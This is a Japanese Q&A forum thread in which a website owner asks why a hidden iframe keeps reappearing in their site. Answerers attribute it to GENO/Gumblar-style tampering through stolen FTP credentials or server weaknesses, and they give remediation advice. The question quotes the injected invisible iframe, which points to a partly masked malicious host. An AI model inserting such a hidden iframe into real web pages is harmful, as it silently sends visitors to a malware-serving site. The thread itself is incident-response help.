• ベストアンサー

ウイルスの検知はないのに、ウェブサイトのソースにプログラムが勝手に挿入され修正ができない

ウェブサイトに <iframe src="http://xc8.**:8080/index.php" width=183 height=175 style="visibility: hidden"></iframe> というプログラムが勝手に挿入されて困っています。 ウイルスソフトがフリーのものだったので、カスペルスキー(internet security2009)を購入してスキャンしました。 以前は検知されていなかったTrojanなどいくつかのウイルスが検知されました。 勝手に挿入されるプログラムは、FTPサーバーにアップロードしたファイルを見ても入っていないのですが、ブラウザで確認すると入っています。削除とアップロードをしなおしてもまた入っていて、ウェブサイトは正常に表示できません。 レンタルサーバー側へもアカウントの変更をお願いし、一旦はなくなったのですが、また入ってしまったのか、再度アカウント変更をしても消すことができません。 カスペルスキーはフルスキャンしても「コンピューターは安全」と表示されるのですが、どうしたらよいかわからず困っています。よろしくお願いします。

質問者が選んだベストアンサー

  • ベストアンサー
  • John_Papa
  • ベストアンサー率61% (1186/1936)
回答No.3

あなたのサイトが、PHPによるオンラインサイト管理をやっているのを前提とされた思われる回答がありましたので、確認しておきます。 FTPアップロードするリモートPCのhtmlファイルにはiframeが入っていないが、WEBサイトのhtmlファイルにはifarameが入っているという事ですね。 それなら、GENOウイルスとほぼ同じです。 圧倒的に多かったのはJavascriptでしたが、GENOウイルスと呼ばれる以前はifarameにwidth=0 height=0 という属性で非表示化していたのですが、5~6月頃よりスタイル属性で不可視化する手法が見られるようになりました。 犯人は同じ頃よりロボットによる巡回改ざんを行っていると見られます。再改ざんが素早い。 あなたの場合も、かつて感染していたウイルスに、FTPのURL・ID・Passwordを盗まれ犯人に転送されていたと考えられます。 >レンタルサーバー側へもアカウントの変更をお願いし、一旦はなくなった という事からもそれが伺えます。 貴方のパソコンのウイルスが駆除されているなら、再度アカウント(ID)・パスワードを変更してください。 ウイルスが駆除されていなければ、またまたFTPのURL・ID・Passwordを盗まれ改ざんは繰り返されます。 ここの質問を締め切り、一度、アダ被さん http://www.higaitaisaku.com/ の質問掲示板にて、不審なソフトがあなたのパソコンで起動するように登録されていないか診て貰ってください。パソコンの健康診断です。 HijackThisというソフトが必携になります。こちらのページを熟読し、質問掲示板に臨んでください。 http://www.higaitaisaku.com/hijackthis.html ウイルスの性質によっては最悪、PCのリカバリーインストールしか解決法が無い事もあります。 心の準備だけはしておいてください。 最小の被害で解決できる事を祈ります。

www0123
質問者

お礼

ご丁寧な回答をいただき、ありがとうございます!! 私は海外で旅行会社の仕事をしており、今回のウェブサイトはその旅行会社がウェブデザインの会社に依頼して作成アップロードをしてきたものです。 「FTPアップロードするリモートPCのhtmlファイルにはiframeが入っていないが、WEBサイトのhtmlファイルにはifarameが入っているという事ですね。」ということで間違いありません。 ウイルスは駆除できたものと思っていたのですが、まだあるのかもしれないので他のオンラインスキャン等でも確認してみたいと思います。 アダ被さんへもアクセスして診てもらいます。 出元がはっきりするように、今は私のPCのみからアップロードをしています。 リカバリーも覚悟しつつ、できるだけ早く会社のサイトが公開できればと思います。 困っているときに助けていただいたことを、本当に有難く思います。 心から感謝します。

その他の回答 (3)

  • John_Papa
  • ベストアンサー率61% (1186/1936)
回答No.4

Re:No.2の「お礼」 この文章に時系列の不明点があります。 >「今回の件のウェブサイトはウェブデザインの会社で作ってもらい、サーバーへのアップロードもすべて任せていました。 そろそろ完成というときになって表示が正しくできなくなり、iframeというプログラムが挿入されていることがわかりました。 ウェブデザイン会社のPCにウイルスなども問題があると思い、FTPアカウントの変更後はFTPパスワードを誰にも渡さずに自分でアップロードを行いましたが、結局解決には至りませんでした。」 www0123さんのパソコンで、”そろそろ完成”前にFTPアクセスされた事が有るか無いか。 www0123さんのFTPアクセスが無ければ、当然ウェブデザインの会社もしくは、サーバー自体の脆弱性を疑う必要があります。 実際、私がヘルプ依頼を受けたケースに、依頼者のPCではなくサーバーレンタル会社のPCのウイルス感染が原因で、そこを利用する多くのユーザーのホームページが改ざんされるというものが有りました。このケースでは依頼者がPCをリカバリーしようがパスワードを変更しようがお構い無しに改竄が繰り返されました。依頼者はレンタル業者を変更しました。 このようなケースもあるという補足です。

www0123
質問者

お礼

ご回答ありがとうございます! iframeというプログラムがはじめて発見された時点では、私は一度もFTPにアクセスしていませんでした。その時点では、デザイン会社のPCにウイルスがいるものと思っていました。デザイン会社側は「サーバーにウイルスが入っている」と言っていました。 FTPアカウントを変更し、私だけがアップロードをしたものの、結局同じことになってしまったので、私のPCに問題があるものと思っていました。他のサーバーで試してみます。 大変勉強になりました!本当にありがとうございました!

  • ryu-fiz
  • ベストアンサー率63% (2705/4228)
回答No.2

参考URLです。 http://www.phpbb-es.com/foro/supuesto-hack-t22649.html スペイン語のページですが、Google翻訳を使えば大体の意味は取れるでしょう。 http://translate.google.co.jp/translate_t PHPなどのウェブアプリケーションを利用してサイトを構築されている場合、バージョンが古いものをそのまま利用していると、脆弱性=セキュリティホールを突かれて感染に至る可能性があります。PHPそのものだけでなく、モジュールについても同様に脆弱性が存在する場合があります。 PHP以外のアプリケーションにも同様な脆弱性が存在する可能性があります。その辺からチェックされるべきです。 また、ホームページビルダーのようなソフトを利用してサイト作成を行なっている場合にも、古いバージョンには脆弱性が存在することがあります。サポートサイトから更新プログラムが存在しないかどうかを確認し、あれば適用することで脆弱性が解消される場合があります。 古くなってサポートされなくなったアプリケーションについては、脆弱性が見つかっても改善手段がないこともあります。これらのソフトで、あまりにも古いバージョンを利用し続けることは危険です。 もし、これまで述べたような点について、そちらで該当しないのであれば、サーバ側に何らかの問題がある可能性もあり得ます。その場合には改善を要求してみてはどうでしょうか。ダメな場合にはIPAに相談する、あるいはサーバを変えるといった手段も考えられます。

www0123
質問者

お礼

早速のご回答をありがとうございました!! 脆弱性という言葉はよく耳にするようになっていたものの、 自分のことは棚にあげていました。 今回の件のウェブサイトはウェブデザインの会社で作ってもらい、サーバーへのアップロードもすべて任せていました。 そろそろ完成というときになって表示が正しくできなくなり、iframeというプログラムが挿入されていることがわかりました。 ウェブデザイン会社のPCにウイルスなども問題があると思い、FTPアカウントの変更後はFTPパスワードを誰にも渡さずに自分でアップロードを行いましたが、結局解決には至りませんでした。 私のPCのアプリケーションにまったく問題がないとは思えないので、まずはそこからかもしれません。削除しつつ、他の手段も検討していきます。 たくさんの情報をいただいて、本当にありがとうございました! 心から感謝します。

  • redirect
  • ベストアンサー率22% (117/514)
回答No.1

マルウェアを集めてテストなどをしている者です。 たぶん同じことの繰り返しになってしまうと思う。 なぜならWebアプリ側に問題がありそうだから。 そういうのは専門家じゃないと無理。IPAとかに相談した方がいいと思う。

www0123
質問者

お礼

早速のご回答をありがとうございます! IPAを知らなかったのですが、調べてみてわかりました。 いろんな機関があるのですね。 早速問い合わせました。 ありがとうございました!!

関連するQ&A

専門家に質問してみよう